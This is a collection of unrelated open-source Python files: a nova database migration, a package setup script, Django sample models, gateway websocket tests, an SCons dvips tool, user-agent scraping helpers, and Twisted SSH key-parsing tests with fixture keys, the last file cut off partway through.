JioCloud/nova | nova/db/sqlalchemy/migrate_repo/versions/227_fix_project_user_quotas_resource_length.py | 81 | 1366 | # Copyright 2013 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, String, Table
def upgrade(migrate_engine):
    """Widen project_user_quotas.resource to 255 chars and repair truncated rows."""
    meta = MetaData(bind=migrate_engine)
    table = Table('project_user_quotas', meta, autoload=True)
    col_resource = getattr(table.c, 'resource')
    if col_resource.type.length == 25:
        # The resource of project_user_quotas table had been changed to
        # invalid length(25) since I56ad98d3702f53fe8cfa94093fea89074f7a5e90.
        # The following code fixes the length for the environments which are
        # deployed after I56ad98d3702f53fe8cfa94093fea89074f7a5e90.
        col_resource.alter(type=String(255))
    # Restore resource names that were truncated to the old 25-char limit.
    table.update().where(table.c.resource == 'injected_file_content_byt')\
        .values(resource='injected_file_content_bytes').execute()
| apache-2.0 |
isaacbernat/awis | setup.py | 1 | 1887 | from setuptools import setup, find_packages
# from codecs import open
# from os import path
# here = path.abspath(path.dirname(__file__))
# # Get the long description from the README file
# with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
# long_description = f.read()
setup(
    # Application name:
    name="myawis",
    # Version number:
    version="0.2.4",
    # Application author details:
    author="Ashim Lamichhane",
    author_email="punchedrock@gmail.com",
    # Packages
    packages=['myawis'],
    # data_files
    data_files=[('awis', ['LICENSE.txt', 'README.rst'])],
    # Include additional files into the package
    include_package_data=True,
    # Details
    url="https://github.com/ashim888/awis",
    # Keywords
    keywords='python awis api call',
    #
    license='GNU General Public License v3.0',
    description="A simple AWIS python wrapper",
    long_description=open('README.rst').read(),
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 2 - Pre-Alpha',
        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        # NOTE(review): this classifier disagrees with license='GNU General
        # Public License v3.0' above -- confirm the intended license.
        'License :: Public Domain',
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
    ],
    install_requires=[
        "requests",
        "beautifulsoup4",
        "lxml",
    ],
    entry_points={
        'console_scripts': [
            'myawis=myawis:main',
        ],
    },
)
| gpl-3.0 |
arc6373/django-rest-swagger | tests/cigar_example/cigar_example/app/models.py | 19 | 1274 | from django.db import models
class Cigar(models.Model):
    """A cigar for sale, linked to its manufacturer."""
    # Vitola shapes selectable in the "form" field.
    FORM_CHOICES = (
        ('parejo', 'Parejo'),
        ('torpedo', 'Torpedo'),
        ('pyramid', 'Pyramid'),
        ('perfecto', 'Perfecto'),
        ('presidente', 'Presidente'),
    )
    name = models.CharField(max_length=25, help_text='Cigar Name')
    colour = models.CharField(max_length=30, default="Brown")
    form = models.CharField(max_length=20, choices=FORM_CHOICES, default='parejo')
    gauge = models.IntegerField()
    length = models.IntegerField()
    # Up to 999.99 (5 digits, 2 decimal places).
    price = models.DecimalField(decimal_places=2, max_digits=5)
    notes = models.TextField()
    manufacturer = models.ForeignKey('Manufacturer')
    def get_absolute_url(self):
        # Canonical REST API location for this cigar.
        return "/api/cigars/%i/" % self.id
class Manufacturer(models.Model):
    """A cigar maker, located in a Country."""
    name = models.CharField(max_length=25, help_text='name of company')
    country = models.ForeignKey('Country')
    def __unicode__(self):
        return self.name
class Country(models.Model):
    """A country of origin for manufacturers."""
    name = models.CharField(max_length=25, null=False, blank=True)
    def __unicode__(self):
        return self.name
    class Meta:
        # Avoid the default auto-plural "Countrys" in the admin.
        verbose_name_plural = "Countries"
class Jambalaya(models.Model):
    """Minimal model holding a free-text recipe (test fixture)."""
    recipe = models.CharField(max_length=256, null=False, blank=False)
| bsd-2-clause |
BeeeOn/server | t/gws/t1006-sensor-data-export.py | 1 | 4343 | #! /usr/bin/env python3
import config
config.import_libs()
import unittest
import websocket
import json
import time
import uuid
from gws import assureIsClosed, assureNotClosed, registerGateway, ZMQConnection
class TestSensorData(unittest.TestCase):
	"""End-to-end checks of the gateway 'sensor_data_export' message.

	Each test opens a websocket as a registered gateway and watches the
	server's ZMQ event stream for the matching on-sensor-data events.
	"""
	def setUp(self):
		# Subscribe to server events that carry a gateway_id.
		self.zmq = ZMQConnection(config.gws_zmq_endpoint)
		self.zmq.accept(lambda m: "gateway_id" in m)
		self.zmq.open()
		self.ws = websocket.WebSocket()
		self.ws.connect(config.gws_ws_uri)
		registerGateway(self, self.ws, config.gateway_id)
		# Registration must be reflected as an on-connected event.
		event = self.zmq.pop_data()
		self.assertEqual("on-connected", event["event"])
		self.assertEqual(config.gateway_id, event["gateway_id"])
	def tearDown(self):
		self.ws.close()
		try:
			# Closing the websocket must emit on-disconnected.
			event = self.zmq.pop_data()
			self.assertEqual("on-disconnected", event["event"])
			self.assertEqual(config.gateway_id, event["gateway_id"])
		finally:
			self.zmq.close()
	"""
	Server just confirms that it received valid sensor data message,
	but nothing more can be determined from its response
	"""
	def test1_export_successful(self):
		id = str(uuid.uuid4())
		# Timestamps are sent in microseconds.
		timestamp = int(time.time() * 1000000)
		msg = json.dumps(
			{
				"message_type" : "sensor_data_export",
				"id" : id,
				"data" : [
					{
						"device_id" : "0xa32d27aa5e94ecfd",
						"timestamp" : timestamp,
						"values": [
							{
								"module_id" : "0",
								"value" : 30.0,
								"valid" : "true"
							},
							{
								"module_id" : "1",
								"valid" : "false"
							},
							{
								"module_id" : "2",
								"value" : 60.0,
								"valid" : "true"
							}
						]
					}
				]
			}
		)
		self.ws.send(msg)
		msg = json.loads(self.ws.recv())
		self.assertEqual("sensor_data_confirm", msg["message_type"])
		self.assertEqual(id, msg["id"])
		assureNotClosed(self, self.ws)
		# The exported values must surface as an on-sensor-data event;
		# the invalid module (1) is reported as None.
		event = self.zmq.pop_data()
		self.assertEqual("on-sensor-data", event["event"])
		self.assertEqual(config.gateway_id, event["gateway_id"])
		self.assertEqual("0xa32d27aa5e94ecfd", event["device_id"])
		self.assertEqual(timestamp, event["timestamp"])
		self.assertEqual(30, event["data"]["0"])
		self.assertIsNone(event["data"]["1"])
		self.assertEqual(60, event["data"]["2"])
	"""
	Even if we send an invalid export message, we get just "confirm" response.
	This test is semi-automatic, it requires to check the server log.
	"""
	def test2_export_fails_due_to_unexisting_device(self):
		id = str(uuid.uuid4())
		msg = json.dumps(
			{
				"message_type" : "sensor_data_export",
				"id" : id,
				"data" : [
					{
						"device_id" : "0xa32d275555555555",
						"timestamp" : 0,
						"values": [
							{
								"module_id" : "5",
								"value" : -1230.0,
								"valid" : "true"
							},
							{
								"module_id" : "22",
								"valid" : "false"
							},
							{
								"module_id" : "89",
								"value" : 3460.132,
								"valid" : "true"
							}
						]
					}
				]
			}
		)
		self.ws.send(msg)
		msg = json.loads(self.ws.recv())
		# Only the protocol-level confirm can be checked here.
		self.assertEqual("sensor_data_confirm", msg["message_type"])
		self.assertEqual(id, msg["id"])
		assureNotClosed(self, self.ws)
	"""
	Send conflicting data (same timestamp). We cannot test anything there
	automatically. But it allows at least a semi-automatic test.
	"""
	def test3_export_fails_due_to_conflicts(self):
		id = str(uuid.uuid4())
		timestamp = int(time.time() * 1000000)
		msg = json.dumps(
			{
				"message_type" : "sensor_data_export",
				"id" : id,
				"data" : [
					{
						"device_id" : "0xa32d27aa5e94ecfd",
						"timestamp" : timestamp,
						"values": [
							{
								"module_id" : "0",
								"value" : 30.0,
								"valid" : "true"
							},
							{
								"module_id" : "0",
								"valid" : "false"
							}
						]
					}
				]
			}
		)
		self.ws.send(msg)
		msg = json.loads(self.ws.recv())
		self.assertEqual("sensor_data_confirm", msg["message_type"])
		self.assertEqual(id, msg["id"])
		assureNotClosed(self, self.ws)
		event = self.zmq.pop_data()
		self.assertEqual("on-sensor-data", event["event"])
		self.assertEqual(config.gateway_id, event["gateway_id"])
		self.assertEqual("0xa32d27aa5e94ecfd", event["device_id"])
		self.assertEqual(timestamp, event["timestamp"])
		self.assertEqual(30, event["data"]["0"])
# Run with a TAP reporter so the t/ harness can consume the results.
if __name__ == '__main__':
	import sys
	import taprunner
	unittest.main(testRunner=taprunner.TAPTestRunner(stream = sys.stdout))
| bsd-3-clause |
faarwa/EngSocP5 | zxing/cpp/scons/scons-local-2.0.0.final.0/SCons/Tool/dvips.py | 34 | 3452 | """SCons.Tool.dvips
Tool-specific initialization for dvips.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/dvips.py 5023 2010/06/14 22:05:46 scons"
import SCons.Action
import SCons.Builder
import SCons.Tool.dvipdf
import SCons.Util
def DviPsFunction(target = None, source= None, env=None):
    # Delegate to the shared dvi->(pdf|ps) helper, binding the PostScript
    # action created in generate() below.
    result = SCons.Tool.dvipdf.DviPdfPsFunction(PSAction,target,source,env)
    return result
def DviPsStrFunction(target = None, source= None, env=None):
    """A strfunction for dvipdf that returns the appropriate
    command string for the no_exec options."""
    if env.GetOption("no_exec"):
        # Dry run (-n): show the substituted $PSCOM command line.
        result = env.subst('$PSCOM',0,target,source)
    else:
        result = ''
    return result
# Module-level action/builder singletons, created lazily in generate().
PSAction = None
DVIPSAction = None
PSBuilder = None
def generate(env):
    """Add Builders and construction variables for dvips to an Environment."""
    global PSAction
    if PSAction is None:
        PSAction = SCons.Action.Action('$PSCOM', '$PSCOMSTR')
    global DVIPSAction
    if DVIPSAction is None:
        DVIPSAction = SCons.Action.Action(DviPsFunction, strfunction = DviPsStrFunction)
    global PSBuilder
    if PSBuilder is None:
        PSBuilder = SCons.Builder.Builder(action = PSAction,
                                          prefix = '$PSPREFIX',
                                          suffix = '$PSSUFFIX',
                                          src_suffix = '.dvi',
                                          src_builder = 'DVI',
                                          single_source=True)
    env['BUILDERS']['PostScript'] = PSBuilder
    env['DVIPS'] = 'dvips'
    env['DVIPSFLAGS'] = SCons.Util.CLVar('')
    # I'm not quite sure I got the directories and filenames right for variant_dir
    # We need to be in the correct directory for the sake of latex \includegraphics eps included files.
    env['PSCOM'] = 'cd ${TARGET.dir} && $DVIPS $DVIPSFLAGS -o ${TARGET.file} ${SOURCE.file}'
    env['PSPREFIX'] = ''
    env['PSSUFFIX'] = '.ps'
def exists(env):
    # Tool is usable only when a dvips executable can be found.
    return env.Detect('dvips')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| gpl-3.0 |
Mhynlo/SickRage | lib/fake_useragent/utils.py | 21 | 3284 | from __future__ import absolute_import, unicode_literals
import codecs
import json
import os
import re
from time import sleep
from threading import Lock
try: # Python 2
from urllib2 import urlopen, Request, URLError
from urllib import quote_plus
except ImportError: # Python 3
from urllib.request import urlopen, Request
from urllib.parse import quote_plus
from urllib.error import URLError
def get(url):
    """Fetch *url*, serializing all downloads and retrying URLError failures.

    Retries up to settings.HTTP_RETRIES times with settings.HTTP_DELAY
    between attempts; the last failure is re-raised.
    """
    with get.lock:
        request = Request(url)
        attempt = 0
        while attempt < settings.HTTP_RETRIES:
            attempt += 1
            try:
                return urlopen(request, timeout=settings.HTTP_TIMEOUT).read()
            except URLError:
                if attempt == settings.HTTP_RETRIES:
                    # Out of retries: propagate the last URLError.
                    raise
                else:
                    sleep(settings.HTTP_DELAY)
# Function attribute used as the module-wide download lock.
get.lock = Lock()
def get_browsers():
    """
    very very hardcoded/dirty re/split stuff, but no dependencies

    Scrapes the w3schools browser-statistics table and returns a list of
    (browser_name, usage_percentage_string) pairs, with names normalized
    through settings.OVERRIDES.
    """
    html = get(settings.BROWSERS_STATS_PAGE)
    html = html.decode('windows-1252')
    # Isolate the statistics table before regexing it.
    html = html.split('<table class="w3-table-all notranslate">')[1]
    html = html.split('</table>')[0]
    browsers = re.findall(r'\.asp">(.+?)<', html, re.UNICODE)
    browsers = [
        settings.OVERRIDES.get(browser, browser) for browser in browsers
    ]
    browsers_statistics = re.findall(
        r'td\sclass="right">(.+?)\s', html, re.UNICODE
    )
    return list(zip(browsers, browsers_statistics))
def get_browser_versions(browser):
    """
    very very hardcoded/dirty re/split stuff, but no dependencies

    Scrapes up to settings.BROWSERS_COUNT_LIMIT user-agent strings for
    *browser* from the listing page and returns them as a list.
    """
    html = get(settings.BROWSER_BASE_PAGE.format(browser=quote_plus(browser)))
    html = html.decode('iso-8859-1')
    html = html.split('<div id=\'liste\'>')[1]
    html = html.split('</div>')[0]
    browsers_iter = re.finditer(r'\?id=\d+\'>(.+?)</a', html, re.UNICODE)
    browsers = []
    for browser in browsers_iter:
        # Skip the trailing "more ..." pagination link.
        if 'more' in browser.group(1).lower():
            continue
        browsers.append(browser.group(1))
        if len(browsers) == settings.BROWSERS_COUNT_LIMIT:
            break
    return browsers
def load():
    """Build the full database: user agents per browser plus a weighted
    'randomize' index proportional to each browser's usage share."""
    browsers_dict = {}
    randomize_dict = {}
    for item in get_browsers():
        browser, percent = item
        browser_key = browser
        # Normalize the display name into a lookup key.
        for value, replacement in settings.REPLACEMENTS.items():
            browser_key = browser_key.replace(value, replacement)
        browser_key = browser_key.lower()
        browsers_dict[browser_key] = get_browser_versions(browser)
        # One randomize slot per 0.1% of usage share, so random picks
        # follow real-world browser popularity.
        for _ in range(int(float(percent) * 10)):
            randomize_dict[str(len(randomize_dict))] = browser_key
    return {
        'browsers': browsers_dict,
        'randomize': randomize_dict
    }
def write(data):
    # Persist the database as UTF-8 JSON at settings.DB.
    with codecs.open(settings.DB, encoding='utf-8', mode='wb+',) as fp:
        json.dump(data, fp)
def read():
    # Load the cached database written by write().
    with codecs.open(settings.DB, encoding='utf-8', mode='rb',) as fp:
        return json.load(fp)
def exist():
    # True when the cached database file is present.
    return os.path.isfile(settings.DB)
def rm():
    # Delete the cached database if it exists (no-op otherwise).
    if exist():
        os.remove(settings.DB)
def update():
    """Regenerate the cached database from the live sources."""
    # rm() already checks for existence, so the original
    # "if exist(): rm()" guard was redundant.
    rm()
    write(load())
def load_cached():
    # Return the cached database, building it on first use.
    if not exist():
        update()
    return read()
from fake_useragent import settings # noqa # isort:skip
| gpl-3.0 |
hendradarwin/VTK | ThirdParty/Twisted/twisted/conch/test/test_keys.py | 27 | 27826 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.ssh.keys}.
"""
try:
import Crypto.Cipher.DES3
except ImportError:
# we'll have to skip these tests without PyCypto and pyasn1
Crypto = None
try:
import pyasn1
except ImportError:
pyasn1 = None
if Crypto and pyasn1:
from twisted.conch.ssh import keys, common, sexpy
import os, base64
from hashlib import sha1
from twisted.conch.test import keydata
from twisted.python import randbytes
from twisted.trial import unittest
class HelpersTestCase(unittest.TestCase):
    """Tests for the module-level helper functions in twisted.conch.ssh.keys."""
    if Crypto is None:
        skip = "cannot run w/o PyCrypto"
    if pyasn1 is None:
        skip = "Cannot run without PyASN1"
    def setUp(self):
        # Make "random" bytes deterministic (all 0x55) for stable signatures.
        self._secureRandom = randbytes.secureRandom
        randbytes.secureRandom = lambda x: '\x55' * x
    def tearDown(self):
        randbytes.secureRandom = self._secureRandom
        self._secureRandom = None
    def test_pkcs1(self):
        """
        Test Public Key Cryptographic Standard #1 functions.
        """
        data = 'ABC'
        messageSize = 6
        self.assertEqual(keys.pkcs1Pad(data, messageSize),
                '\x01\xff\x00ABC')
        hash = sha1().digest()
        messageSize = 40
        self.assertEqual(keys.pkcs1Digest('', messageSize),
                '\x01\xff\xff\xff\x00' + keys.ID_SHA1 + hash)
    def _signRSA(self, data):
        # Sign *data* with the fixture RSA key; return (keyObject, signature).
        key = keys.Key.fromString(keydata.privateRSA_openssh)
        sig = key.sign(data)
        return key.keyObject, sig
    def _signDSA(self, data):
        # Sign *data* with the fixture DSA key; return (keyObject, signature).
        key = keys.Key.fromString(keydata.privateDSA_openssh)
        sig = key.sign(data)
        return key.keyObject, sig
    def test_signRSA(self):
        """
        Test that RSA keys return appropriate signatures.
        """
        data = 'data'
        key, sig = self._signRSA(data)
        sigData = keys.pkcs1Digest(data, keys.lenSig(key))
        v = key.sign(sigData, '')[0]
        self.assertEqual(sig, common.NS('ssh-rsa') + common.MP(v))
        return key, sig
    def test_signDSA(self):
        """
        Test that DSA keys return appropriate signatures.
        """
        data = 'data'
        key, sig = self._signDSA(data)
        sigData = sha1(data).digest()
        # The 19-byte k comes from the patched secureRandom above.
        v = key.sign(sigData, '\x55' * 19)
        self.assertEqual(sig, common.NS('ssh-dss') + common.NS(
            Crypto.Util.number.long_to_bytes(v[0], 20) +
            Crypto.Util.number.long_to_bytes(v[1], 20)))
        return key, sig
    def test_objectType(self):
        """
        Test that objectType, returns the correct type for objects.
        """
        self.assertEqual(keys.objectType(keys.Key.fromString(
            keydata.privateRSA_openssh).keyObject), 'ssh-rsa')
        self.assertEqual(keys.objectType(keys.Key.fromString(
            keydata.privateDSA_openssh).keyObject), 'ssh-dss')
        self.assertRaises(keys.BadKeyError, keys.objectType, None)
class KeyTestCase(unittest.TestCase):
if Crypto is None:
skip = "cannot run w/o PyCrypto"
if pyasn1 is None:
skip = "Cannot run without PyASN1"
def setUp(self):
self.rsaObj = Crypto.PublicKey.RSA.construct((1L, 2L, 3L, 4L, 5L))
self.dsaObj = Crypto.PublicKey.DSA.construct((1L, 2L, 3L, 4L, 5L))
self.rsaSignature = ('\x00\x00\x00\x07ssh-rsa\x00'
'\x00\x00`N\xac\xb4@qK\xa0(\xc3\xf2h \xd3\xdd\xee6Np\x9d_'
'\xb0>\xe3\x0c(L\x9d{\txUd|!\xf6m\x9c\xd3\x93\x842\x7fU'
'\x05\xf4\xf7\xfaD\xda\xce\x81\x8ea\x7f=Y\xed*\xb7\xba\x81'
'\xf2\xad\xda\xeb(\x97\x03S\x08\x81\xc7\xb1\xb7\xe6\xe3'
'\xcd*\xd4\xbd\xc0wt\xf7y\xcd\xf0\xb7\x7f\xfb\x1e>\xf9r'
'\x8c\xba')
self.dsaSignature = ('\x00\x00\x00\x07ssh-dss\x00\x00'
'\x00(\x18z)H\x8a\x1b\xc6\r\xbbq\xa2\xd7f\x7f$\xa7\xbf'
'\xe8\x87\x8c\x88\xef\xd9k\x1a\x98\xdd{=\xdec\x18\t\xe3'
'\x87\xa9\xc72h\x95')
self.oldSecureRandom = randbytes.secureRandom
randbytes.secureRandom = lambda x: '\xff' * x
self.keyFile = self.mktemp()
file(self.keyFile, 'wb').write(keydata.privateRSA_lsh)
def tearDown(self):
randbytes.secureRandom = self.oldSecureRandom
del self.oldSecureRandom
os.unlink(self.keyFile)
def test__guessStringType(self):
"""
Test that the _guessStringType method guesses string types
correctly.
"""
self.assertEqual(keys.Key._guessStringType(keydata.publicRSA_openssh),
'public_openssh')
self.assertEqual(keys.Key._guessStringType(keydata.publicDSA_openssh),
'public_openssh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateRSA_openssh), 'private_openssh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateDSA_openssh), 'private_openssh')
self.assertEqual(keys.Key._guessStringType(keydata.publicRSA_lsh),
'public_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.publicDSA_lsh),
'public_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.privateRSA_lsh),
'private_lsh')
self.assertEqual(keys.Key._guessStringType(keydata.privateDSA_lsh),
'private_lsh')
self.assertEqual(keys.Key._guessStringType(
keydata.privateRSA_agentv3), 'agentv3')
self.assertEqual(keys.Key._guessStringType(
keydata.privateDSA_agentv3), 'agentv3')
self.assertEqual(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'),
'blob')
self.assertEqual(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x01'),
'blob')
self.assertEqual(keys.Key._guessStringType('not a key'),
None)
def _testPublicPrivateFromString(self, public, private, type, data):
self._testPublicFromString(public, type, data)
self._testPrivateFromString(private, type, data)
def _testPublicFromString(self, public, type, data):
publicKey = keys.Key.fromString(public)
self.assertTrue(publicKey.isPublic())
self.assertEqual(publicKey.type(), type)
for k, v in publicKey.data().items():
self.assertEqual(data[k], v)
def _testPrivateFromString(self, private, type, data):
privateKey = keys.Key.fromString(private)
self.assertFalse(privateKey.isPublic())
self.assertEqual(privateKey.type(), type)
for k, v in data.items():
self.assertEqual(privateKey.data()[k], v)
def test_fromOpenSSH(self):
"""
Test that keys are correctly generated from OpenSSH strings.
"""
self._testPublicPrivateFromString(keydata.publicRSA_openssh,
keydata.privateRSA_openssh, 'RSA', keydata.RSAData)
self.assertEqual(keys.Key.fromString(
keydata.privateRSA_openssh_encrypted,
passphrase='encrypted'),
keys.Key.fromString(keydata.privateRSA_openssh))
self.assertEqual(keys.Key.fromString(
keydata.privateRSA_openssh_alternate),
keys.Key.fromString(keydata.privateRSA_openssh))
self._testPublicPrivateFromString(keydata.publicDSA_openssh,
keydata.privateDSA_openssh, 'DSA', keydata.DSAData)
def test_fromOpenSSH_with_whitespace(self):
    """
    If key strings have trailing whitespace, it should be ignored.
    """
    # from bug #3391, since our test key data doesn't have
    # an issue with appended newlines
    privateDSAData = """-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDylESNuc61jq2yatCzZbenlr9llG+p9LhIpOLUbXhhHcwC6hrh
EZIdCKqTO0USLrGoP5uS9UHAUoeN62Z0KXXWTwOWGEQn/syyPzNJtnBorHpNUT9D
Qzwl1yUa53NNgEctpo4NoEFOx8PuU6iFLyvgHCjNn2MsuGuzkZm7sI9ZpQIVAJiR
9dPc08KLdpJyRxz8T74b4FQRAoGAGBc4Z5Y6R/HZi7AYM/iNOM8su6hrk8ypkBwR
a3Dbhzk97fuV3SF1SDrcQu4zF7c4CtH609N5nfZs2SUjLLGPWln83Ysb8qhh55Em
AcHXuROrHS/sDsnqu8FQp86MaudrqMExCOYyVPE7jaBWW+/JWFbKCxmgOCSdViUJ
esJpBFsCgYEA7+jtVvSt9yrwsS/YU1QGP5wRAiDYB+T5cK4HytzAqJKRdC5qS4zf
C7R0eKcDHHLMYO39aPnCwXjscisnInEhYGNblTDyPyiyNxAOXuC8x7luTmwzMbNJ
/ow0IqSj0VF72VJN9uSoPpFd4lLT0zN8v42RWja0M8ohWNf+YNJluPgCFE0PT4Vm
SUrCyZXsNh6VXwjs3gKQ
-----END DSA PRIVATE KEY-----"""
    # Parsing must produce the same key whether or not a trailing
    # newline is appended to the PEM data.
    self.assertEqual(keys.Key.fromString(privateDSAData),
                     keys.Key.fromString(privateDSAData + '\n'))
def test_fromNewerOpenSSH(self):
    """
    Newer versions of OpenSSH generate encrypted keys which have a longer
    IV than the older versions. These newer keys are also loaded.
    """
    withoutNewline = keys.Key.fromString(
        keydata.privateRSA_openssh_encrypted_aes, passphrase='testxp')
    self.assertEqual(withoutNewline.type(), 'RSA')
    # A trailing newline on the PEM data must not change the result.
    withNewline = keys.Key.fromString(
        keydata.privateRSA_openssh_encrypted_aes + '\n',
        passphrase='testxp')
    self.assertEqual(withoutNewline, withNewline)
def test_fromLSH(self):
    """
    Test that keys are correctly generated from LSH strings, and that
    s-expressions naming an unknown key type are rejected.
    """
    self._testPublicPrivateFromString(
        keydata.publicRSA_lsh, keydata.privateRSA_lsh,
        'RSA', keydata.RSAData)
    self._testPublicPrivateFromString(
        keydata.publicDSA_lsh, keydata.privateDSA_lsh,
        'DSA', keydata.DSAData)
    # A well-formed s-expression with a bogus key type must raise
    # BadKeyError, in both the public and the private representation.
    badPublic = sexpy.pack([['public-key', ['bad-key', ['p', '2']]]])
    self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                      data='{' + base64.encodestring(badPublic) + '}')
    badPrivate = sexpy.pack([['private-key', ['bad-key', ['p', '2']]]])
    self.assertRaises(keys.BadKeyError, keys.Key.fromString, badPrivate)
def test_fromAgentv3(self):
    """
    Test that keys are correctly generated from Agent v3 strings and
    that blobs with an unknown algorithm name are rejected.
    """
    self._testPrivateFromString(
        keydata.privateRSA_agentv3, 'RSA', keydata.RSAData)
    self._testPrivateFromString(
        keydata.privateDSA_agentv3, 'DSA', keydata.DSAData)
    badBlob = '\x00\x00\x00\x07ssh-foo' + '\x00\x00\x00\x01\x01' * 5
    self.assertRaises(keys.BadKeyError, keys.Key.fromString, badBlob)
def test_fromStringErrors(self):
    """
    keys.Key.fromString should raise BadKeyError when the key is invalid.
    """
    # completely empty input
    self.assertRaises(keys.BadKeyError, keys.Key.fromString, '')
    # no key data with a bad key type
    self.assertRaises(keys.BadKeyError, keys.Key.fromString, '',
                      'bad_type')
    # trying to decrypt a key which doesn't support encryption
    self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                      keydata.publicRSA_lsh, passphrase = 'unencrypted')
    # decrypting an encrypted key without supplying the passphrase
    # raises EncryptedKeyError rather than BadKeyError
    self.assertRaises(keys.EncryptedKeyError, keys.Key.fromString,
                      keys.Key(self.rsaObj).toString('openssh', 'encrypted'))
    # key with no key data
    self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                      '-----BEGIN RSA KEY-----\nwA==\n')
    # key with invalid DEK Info (the "DEK-Info" header is not of the
    # expected "cipher,iv" form)
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromString,
        """-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: weird type
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
